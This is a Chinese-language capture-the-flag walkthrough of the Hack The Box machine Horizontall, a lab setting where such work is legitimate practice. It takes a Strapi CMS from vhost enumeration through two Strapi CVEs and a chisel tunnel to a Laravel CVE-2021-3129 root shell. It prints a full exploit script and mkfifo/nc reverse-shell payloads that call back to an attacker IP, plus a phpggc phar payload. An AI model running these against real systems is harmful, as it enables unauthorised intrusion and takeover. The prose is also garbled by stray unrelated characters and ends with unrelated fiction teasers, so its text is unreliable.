【HTB】Horizontal（vhost爆破，chisel隧道）

免責(zé)聲明

本文滲透的主機(jī)經(jīng)過合法授權(quán)其骄。本文使用的工具和方法僅限學(xué)習(xí)交流使用扯旷，請(qǐng)不要將文中使用的工具和滲透思路用于任何非法用途钧忽，對(duì)此產(chǎn)生的一切后果耸黑，本人不承擔(dān)任何責(zé)任大刊，也不對(duì)造成的任何誤用或損害負(fù)責(zé)。

服務(wù)探測(cè)

┌──(root??kali)-[~]
└─# nmap -sV -Pn 10.10.11.105                         
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-02 08:48 EST
Nmap scan report for 10.10.11.105
Host is up (0.34s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

手機(jī)訪問80端口，跳轉(zhuǎn)到了一個(gè)叫horizontall.htb的域名

我們先把這個(gè)域名添加到/etc/hosts

echo "10.10.11.105 horizontall.htb" >> /etc/hosts

爆破目錄

┌──(root??kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://horizontall.htb/                                                                               

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/horizontall.htb/-_21-12-02_09-01-00.txt

Error Log: /root/dirsearch/logs/errors-21-12-02_09-01-00.log

Target: http://horizontall.htb/

[09:01:01] Starting: 
[09:01:10] 301 -  194B  - /js  ->  http://horizontall.htb/js/              
[09:01:11] 400 -  182B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd            
[09:01:56] 400 -  182B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd     
[09:02:01] 301 -  194B  - /css  ->  http://horizontall.htb/css/             
[09:02:06] 200 -    4KB - /favicon.ico                                      
[09:02:11] 301 -  194B  - /img  ->  http://horizontall.htb/img/             
[09:02:15] 403 -  580B  - /js/                                              
[09:02:17] 200 -  901B  - /index.html

只有幾個(gè)文件夾，沒啥有用的發(fā)現(xiàn)

vhost爆破

這里我卡了很久剂陡，找不到任何有用的東西，后來上論壇看hint薯嗤，有人留言說二級(jí)域名可能有點(diǎn)東西

嘗試爆破vhost骆姐，我們使用gobuster

先把這個(gè)字典下載到本地

┌──(root??kali)-[~/htb/Horizontall]
└─# gobuster vhost -u horizontall.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://horizontall.htb
[+] Method:       GET
[+] Threads:      100
[+] Wordlist:     /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2021/12/02 23:28:43 Starting gobuster in VHOST enumeration mode
===============================================================
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]
                                                         
===============================================================
2021/12/02 23:35:06 Finished
===============================================================

找到一個(gè)可以利用的二級(jí)域名：api-prod.horizontall.htb

再次編輯/etc/hosts

把10.10.11.105 horizontall.htb替換成10.10.11.105 api-prod.horizontall.htb

現(xiàn)在我們可以在瀏覽器打開api-prod.horizontall.htb了

爆破二級(jí)域名

┌──(root??kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://api-prod.horizontall.htb/ 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/api-prod.horizontall.htb/-_21-12-03_00-35-14.txt

Error Log: /root/dirsearch/logs/errors-21-12-03_00-35-14.log

Target: http://api-prod.horizontall.htb/

[00:35:15] Starting: 
[00:35:24] 400 -  182B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd            
[00:35:35] 200 -  854B  - /ADMIN                                            
[00:35:35] 200 -  854B  - /Admin/login/                                     
[00:35:35] 200 -  854B  - /Admin                                            
[00:35:40] 400 -   67B  - /\..\..\..\..\..\..\..\..\..\etc\passwd           
[00:35:45] 200 -  854B  - /admin                                            
[00:35:47] 200 -  854B  - /admin/_logs/access_log                           
[00:35:47] 200 -  854B  - /admin/.config                                    
[00:35:47] 200 -  854B  - /admin/.htaccess                                  
[00:35:47] 200 -  854B  - /admin/?/login
[00:35:47] 200 -  854B  - /admin/                                           
[00:35:47] 200 -  854B  - /admin/_logs/error-log
[00:35:47] 200 -  854B  - /admin/access_log                                 
[00:35:47] 200 -  854B  - /admin/admin-login                                
[00:35:47] 200 -  854B  - /admin/_logs/access-log
[00:35:47] 200 -  854B  - /admin/admin                                      
[00:35:47] 200 -  854B  - /admin/_logs/error_log
[00:35:47] 200 -  854B  - /admin/admin/login                                
[00:35:47] 200 -  854B  - /admin/adminLogin                                 
[00:35:47] 200 -  854B  - /admin/backup/                                    
[00:35:48] 200 -  854B  - /admin/backups/                                   
[00:35:48] 200 -  854B  - /admin/controlpanel                               
[00:35:48] 200 -  854B  - /admin/db/                                        
[00:35:48] 200 -  854B  - /admin/error_log
[00:35:48] 200 -  854B  - /admin/default
[00:35:48] 200 -  854B  - /admin/FCKeditor                                  
[00:35:48] 200 -  854B  - /admin/home                                       
[00:35:48] 200 -  854B  - /admin/index                                      
[00:35:48] 200 -  854B  - /admin/index.html                                 
[00:35:48] 200 -  854B  - /admin/js/tiny_mce                                
[00:35:48] 200 -  854B  - /admin/login                                      
[00:35:48] 200 -  854B  - /admin/js/tiny_mce/
[00:35:48] 200 -  854B  - /admin/js/tinymce/                                
[00:35:48] 200 -  854B  - /admin/js/tinymce                                 
[00:35:48] 200 -  854B  - /admin/cp                                         
[00:35:48] 200 -  854B  - /admin/account                                    
[00:35:48] 200 -  854B  - /admin/dumper/                                    
[00:35:48] 200 -  854B  - /admin/log                                        
[00:35:48] 200 -  854B  - /admin/logs/                                      
[00:35:48] 200 -  854B  - /admin/logs/error_log                             
[00:35:48] 200 -  854B  - /admin/logs/access_log                            
[00:35:48] 200 -  854B  - /admin/mysql/                                     
[00:35:48] 200 -  854B  - /admin/logs/access-log                            
[00:35:48] 200 -  854B  - /admin/phpMyAdmin                                 
[00:35:48] 200 -  854B  - /admin/logs/error-log
[00:35:48] 200 -  854B  - /admin/admin_login                                
[00:35:48] 200 -  854B  - /admin/phpMyAdmin/                                
[00:35:48] 200 -  854B  - /admin/manage                                     
[00:35:48] 200 -  854B  - /admin/pMA/
[00:35:48] 200 -  854B  - /admin/pma/                                       
[00:35:48] 200 -  854B  - /admin/portalcollect.php?f=http://xxx&t=js
[00:35:48] 200 -  854B  - /admin/phpmyadmin/
[00:35:48] 200 -  854B  - /admin/scripts/fckeditor
[00:35:48] 200 -  854B  - /admin/release
[00:35:48] 200 -  854B  - /admin/sysadmin/                                  
[00:35:48] 200 -  854B  - /admin/private/logs
[00:35:48] 200 -  854B  - /admin/sqladmin/                                  
[00:35:48] 200 -  854B  - /admin/sxd/
[00:35:48] 200 -  854B  - /admin/signin                                     
[00:35:48] 200 -  854B  - /admin/tinymce
[00:35:48] 200 -  854B  - /admin/tiny_mce                                   
[00:35:49] 200 -  854B  - /admin/web/                                       
[00:36:20] 400 -  182B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd     
[00:36:38] 200 -    1KB - /favicon.ico                                      
[00:36:46] 200 -  413B  - /index.html                                       
[00:37:17] 200 -  507B  - /reviews                                          
[00:37:17] 200 -  121B  - /robots.txt

有一個(gè)admin的后臺(tái)
查看網(wǎng)頁源代碼，發(fā)現(xiàn)這個(gè)后臺(tái)是由一個(gè)叫Strapi的cms做的

CVE-2019-18818

我們?cè)诠雀杷阉鬟@個(gè)cms的漏洞利用腳本窟社，選擇這個(gè)exp

下載到本地以后執(zhí)行攻擊

┌──(root??kali)-[~/htb/Horizontall]
└─# python3 exp.py http://api-prod.horizontall.htb/                                                                        
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit


[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM4NzY5NTcyLCJleHAiOjE2NDEzNjE1NzJ9.4rETx89O06Mqa1fWj4uwUVhqK9krXg6dP4BzfudH4mI

此時(shí)我們有了一個(gè)cms的登錄憑證：admin:SuperStrongPassword1

同時(shí)記住這個(gè)token：eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM4NzY5NTcyLCJleHAiOjE2NDEzNjE1NzJ9.4rETx89O06Mqa1fWj4uwUVhqK9krXg6dP4BzfudH4mI

CVE-2019-19609

登錄進(jìn)入后臺(tái)以后灿里，我們?cè)趦x表盤發(fā)現(xiàn)cms的版本號(hào)是：Strapi v3.0.0-beta.17.4

根據(jù)這個(gè)版本號(hào)匣吊。在谷歌上搜索可以利用的exp色鸳，我們找到這個(gè)攻擊腳本

下載到本地

執(zhí)行下面payload

python3 exp2.py "http://api-prod.horizontall.htb" "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM4NzY5NTcyLCJleHAiOjE2NDEzNjE1NzJ9.4rETx89O06Mqa1fWj4uwUVhqK9krXg6dP4BzfudH4mI" "id" "10.10.14.16"

┌──(root??kali)-[~/htb/Horizontall]
└─# python3 exp2.py "http://api-prod.horizontall.htb" "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM4NzY5NTcyLCJleHAiOjE2NDEzNjE1NzJ9.4rETx89O06Mqa1fWj4uwUVhqK9krXg6dP4BzfudH4mI" "id" "10.10.14.16"

=====================================
CVE-2019-19609 - Strapi RCE
-------------------------------------
@David_Uton (M3n0sD0n4ld)
https://m3n0sd0n4ld.github.io/
=====================================

[+] Successful operation!!!
listening on [any] 9999 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.105] 45258
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
{"statusCode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}

第三個(gè)參數(shù)可以執(zhí)行一條命令命雀，由上可見當(dāng)前webshell用戶是strapi

但是這個(gè)shell每次只能執(zhí)行一條命令吏砂，不好用赊抖。

現(xiàn)在我們知道exp是可以執(zhí)行系統(tǒng)命令的寨典，現(xiàn)在我們直接修改exp為一個(gè)反彈shell

# Exploit Title: Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 29/08/2021
# Exploit Author: David Utón (M3n0sD0n4ld)
# Vendor Homepage: https://strapi.io/
# Affected Version: strapi-3.0.0-beta.17.7 and earlier
# Tested on: Linux Ubuntu 18.04.5 LTS
# CVE : CVE-2019-19609

#!/usr/bin/python3
# Author: @David_Uton (m3n0sd0n4ld)
# Github: https://m3n0sd0n4ld.github.io
# Usage: python3 CVE-2019-19609.py http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST

import requests, sys, os, socket

logoType = ('''
=====================================
CVE-2019-19609 - Strapi RCE
-------------------------------------
@David_Uton (M3n0sD0n4ld)
https://m3n0sd0n4ld.github.io/
=====================================
        ''')

if __name__ == '__main__':

    # Parameter checking
    if len(sys.argv) != 5:
        print(logoType)
        print("[!] Some of these parameters are missing.")
        print('''
        Use: python3 %s http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST
        Example: python3 10.10.10.10 eyJHbGCi..... "id" 127.0.0.1''' % sys.argv[0])
    # Exploit run
    else:
        # Paremeters
        url = sys.argv[1]
        token = sys.argv[2]
        command = sys.argv[3]
        lhost = sys.argv[4]
        lport = 9999
        
        s = requests.session()
        
        r = s.post(url, verify=False) # SSL == verify=True
        
        headersData = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
            'Authorization': "Bearer %s" % token
        }

        postData = {
            "plugin":"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 4242 >/tmp/f)" 
        }
        
        print(logoType)
        os.system("nc -nvlp 9999 &")
        try:
            print("[+] Successful operation!!!")
            r = s.post(url + "/admin/plugins/install", headers=headersData, data=postData, verify=False) # SSL == verify=True
            # Content print
            print(r.text)
        except:
            print("[!] An error occurred, try again.")
            sys.exit(1)

把postData里面的值從

"plugin":"documentation && $(%s > /tmp/.m3 && nc %s %s < /tmp/.m3 | rm /tmp/.m3)" % (command, lhost, lport)

改成：

"plugin":"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 4242 >/tmp/f)"

保存。

開啟監(jiān)聽井氢，執(zhí)行攻擊花竞。

收到反彈的完整shell

─# nc -lnvp 4242               
listening on [any] 4242 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.105] 58760
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
$ whoami
strapi

提權(quán)

查看所有tcp連接

netstat -nap|grep tcp
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      1845/node /usr/bin/ 
tcp        0     23 10.10.11.105:35982      10.10.14.16:4242        ESTABLISHED 2825/nc             
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -

查看所有進(jìn)程

ps -aux |more
USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
strapi     1798  0.0  0.3  76648  7324 ?        Ss   05:40   0:00 /lib/systemd/systemd --user
strapi     1834  0.0  2.0 610056 40608 ?        Ssl  05:40   0:00 PM2 v4.5.6: God Daemon (/opt/strapi/.pm2)
strapi     1845  0.4  3.5 910600 72176 ?        Ssl  05:40   0:03 node /usr/bin/strapi
strapi     2801  0.2  2.0 804984 40656 ?        Sl   05:50   0:00 npm
strapi     2819  0.0  0.0   4640   932 ?        S    05:50   0:00 sh -c strapi "install" "documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 4242 >/tmp/f)"
strapi     2820  0.0  0.0   4640   104 ?        S    05:50   0:00 sh -c strapi "install" "documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 4242 >/tmp/f)"
strapi     2823  0.0  0.0   6328   748 ?        S    05:50   0:00 cat /tmp/f
strapi     2824  0.0  0.0   4640   816 ?        S    05:50   0:00 /bin/sh -i
strapi     2825  0.0  0.1  15724  2184 ?        S    05:50   0:00 nc 10.10.14.16 4242
strapi     2844  0.0  0.4  38980  9768 ?        S    05:51   0:00 python3 -c __import__('pty').spawn('/bin/bash')
strapi     2845  0.0  0.2  21364  5152 pts/0    Ss   05:51   0:00 /bin/bash
strapi     2930  0.0  0.1  38384  3508 pts/0    R+   05:53   0:00 ps -aux
strapi     2931  0.0  0.0   8424   932 pts/0    S+   05:53   0:00 more

根據(jù)進(jìn)程和本地連接顯示，有3個(gè)進(jìn)程是只允許127.0.0.1本地監(jiān)聽的
3306是數(shù)據(jù)庫牵辣，這個(gè)正常
1337是我們進(jìn)來時(shí)候是strapi，我們從外網(wǎng)通過二級(jí)域名也可以訪問
剩下的8000端口不知道是什么服務(wù)戴卜，我們用隧道連接看看

chisel隧道連接

kali端

┌──(root??kali)-[~/chisel]
└─# ./chisel server -p 8888 --reverse
2021/12/06 01:19:43 server: Reverse tunnelling enabled
2021/12/06 01:19:43 server: Fingerprint RrZsQFbor2kqfDlA6y9yeOs9BiezohKLhkENPxg4P9A=
2021/12/06 01:19:43 server: Listening on http://0.0.0.0:8000
2021/12/06 01:20:59 server: session#1: tun: proxy#R:1337=>localhost:1337: Listening

靶機(jī)端

strapi@horizontall:/tmp$ ./chisel client 10.10.14.16:8888 R:8000:localhost:8000
<hisel client 10.10.14.16:8000 R:1337:localhost:1337
2021/12/06 06:22:21 client: Connecting to ws://10.10.14.16:8000
2021/12/06 06:22:24 client: Connected (Latency 386.283845ms)

現(xiàn)在我們本地已經(jīng)監(jiān)聽到這個(gè)端口的服務(wù)了

┌──(root??kali)-[~]
└─# netstat -ano |grep 8000
tcp6       0      0 :::8000                 :::*                    LISTEN      off (0.00/0/0)

瀏覽器打開localhost：8000是一個(gè)Laravel的展示頁膳帕，顯示版本是Laravel v8 (PHP v7.4.18)

爆破這個(gè)站點(diǎn)薇缅，看看有什么文件和目錄

┌──(root??kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://localhost:8000                                                               

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/localhost-8000/_21-12-06_01-38-51.txt

Error Log: /root/dirsearch/logs/errors-21-12-06_01-38-51.log

Target: http://localhost:8000/

[01:38:52] Starting: 
[01:39:14] 200 -  603B  - /.htaccess                                       
[01:39:14] 200 -   17KB - /.htaccess/                                      
[01:39:48] 405 -  547KB - /_ignition/execute-solution                       
[01:40:51] 200 -    1KB - /web.config

CVE-2021-3129

查看/_ignition/execute-solution目錄汤徽，結(jié)合頁面信息谷歌搜索有可能存在CVE-2021-3129

我在github上找到了這個(gè)exp

根據(jù)exp的攻擊步驟灸撰，首先要在kali上安裝phpggc

sudo apt install phpggc

把執(zhí)行命令id編譯到/tmp/exploit.phar文件

┌──(root??kali)-[~/htb/Horizontall/phpggc]
└─# php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id

查看tmp文件夾下已經(jīng)生成了一個(gè)phar文件

┌──(root??kali)-[~/htb/Horizontall/phpggc]
└─# ll /tmp/exploit.phar 
-rw-r--r-- 1 root root 514 12月  6 02:33 /tmp/exploit.phar

執(zhí)行攻擊：

┌──(root??kali)-[~/htb/Horizontall]
└─# python3 exp3.py  http://localhost:8000/ /tmp/exploit.phar                                                                                                                                                                           1 ?
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
+ Phar deserialized
--------------------------
uid=0(root) gid=0(root) groups=0(root)
--------------------------
+ Logs cleared

成功回顯命令完疫，發(fā)現(xiàn)是root權(quán)限

上面已經(jīng)證明漏洞存在债蓝，可以執(zhí)行任意命令饰迹，編譯反彈shell

┌──(root??kali)-[~/htb/Horizontall/phpggc]
└─# php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 4444 >/tmp/f'

開啟一個(gè)監(jiān)聽

nc -lnvp 4444

再次執(zhí)行攻擊，收到root的反彈shell

┌──(root??kali)-[~]
└─# nc -lnvp 4444                                                                                                                                                                                                                       1 ?
listening on [any] 4444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.105] 60848
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

總結(jié)

這是我第一次打HTB現(xiàn)役的機(jī)器匿值，斷斷續(xù)續(xù)還花了挺長時(shí)間赂摆，vhost和隧道那里是很關(guān)鍵的兩步烟号，不然沒法做下去褥符，我自己也是看了論壇上作者的hint才想到。趟大。
吃過的虧都是經(jīng)驗(yàn)铣焊，繼續(xù)努力曲伊。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者

人面猴
序言：七十年代末坟募，一起剝皮案震驚了整個(gè)濱河市懈糯，隨后出現(xiàn)的幾起案子，更是在濱河造成了極大的恐慌她紫，老刑警劉巖贿讹，帶你破解...
沈念sama閱讀 217,657評(píng)論 6贊 505
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件民褂，死亡現(xiàn)場(chǎng)離奇詭異，居然都是意外死亡，警方通過查閱死者的電腦和手機(jī)助赞，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 92,889評(píng)論 3贊 394
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門买羞，熙熙樓的掌柜王于貴愁眉苦臉地迎上來袁勺，“玉大人雹食，你說我怎么就攤上這事∑诜幔” “怎么了群叶？”我有些...
開封第一講書人閱讀 164,057評(píng)論 0贊 354
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵，是天一觀的道長钝荡。經(jīng)常有香客問我，道長埠通，這世上最難降的妖魔是什么赎离？我笑而不...
開封第一講書人閱讀 58,509評(píng)論 1贊 293
?港島之戀（遺憾婚禮）
正文為了忘掉前任，我火速辦了婚禮端辱，結(jié)果婚禮上梁剔，老公的妹妹穿的比我還像新娘。我一直安慰自己舞蔽，他們只是感情好荣病，可當(dāng)我...
茶點(diǎn)故事閱讀 67,562評(píng)論 6贊 392
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布。她就那樣靜靜地躺著渗柿，像睡著了一般个盆。火紅的嫁衣襯著肌膚如雪。梳的紋絲不亂的頭發(fā)上朵栖，一...
開封第一講書人閱讀 51,443評(píng)論 1贊 302
城市分裂傳說
那天颊亮，我揣著相機(jī)與錄音，去河邊找鬼陨溅。笑死终惑，一個(gè)胖子當(dāng)著我的面吹牛，可吹牛的內(nèi)容都是我干的声登。我是一名探鬼主播狠鸳，決...
沈念sama閱讀 40,251評(píng)論 3贊 418
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼，長吁一口氣：“原來是場(chǎng)噩夢(mèng)啊……” “哼悯嗓！你這毒婦竟也來了件舵？” 一聲冷哼從身側(cè)響起，我...
開封第一講書人閱讀 39,129評(píng)論 0贊 276
萬榮殺人案實(shí)錄
序言：老撾萬榮一對(duì)情侶失蹤脯厨，失蹤者是張志新（化名）和其女友劉穎铅祸，沒想到半個(gè)月后，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體，經(jīng)...
沈念sama閱讀 45,561評(píng)論 1贊 314
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡临梗，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 37,779評(píng)論 3贊 335
?白月光啟示錄
正文我和宋清朗相戀三年涡扼，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片盟庞。...
茶點(diǎn)故事閱讀 39,902評(píng)論 1贊 348
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡吃沪，死狀恐怖，靈堂內(nèi)的尸體忽然破棺而出什猖，到底是詐尸還是另有隱情票彪，我是刑警寧澤，帶...
沈念sama閱讀 35,621評(píng)論 5贊 345
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布不狮，位于F島的核電站降铸，受9級(jí)特大地震影響，放射性物質(zhì)發(fā)生泄漏摇零。R本人自食惡果不足惜推掸，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 41,220評(píng)論 3贊 328
男人毒藥：我在死后第九天來索命
文/蒙蒙一、第九天我趴在偏房一處隱蔽的房頂上張望驻仅。院中可真熱鬧谅畅，春花似錦、人聲如沸雾家。這莊子的主人今日做“春日...
開封第一講書人閱讀 31,838評(píng)論 0贊 22
一樁弒父案，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽芯咧。三九已至牙捉，卻和暖如春，著一層夾襖步出監(jiān)牢的瞬間敬飒，已是汗流浹背邪铲。一陣腳步聲響...
開封第一講書人閱讀 32,971評(píng)論 1贊 269
情欲美人皮
我被黑心中介騙來泰國打工，沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留无拗，地道東北人带到。一個(gè)月前我還...
沈念sama閱讀 48,025評(píng)論 2贊 370
代替公主和親
正文我出身青樓，卻偏偏與公主長得像英染，于是被迫代替她去往敵國和親揽惹。傳聞我的和親對(duì)象是個(gè)殘疾皇子，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 44,843評(píng)論 2贊 354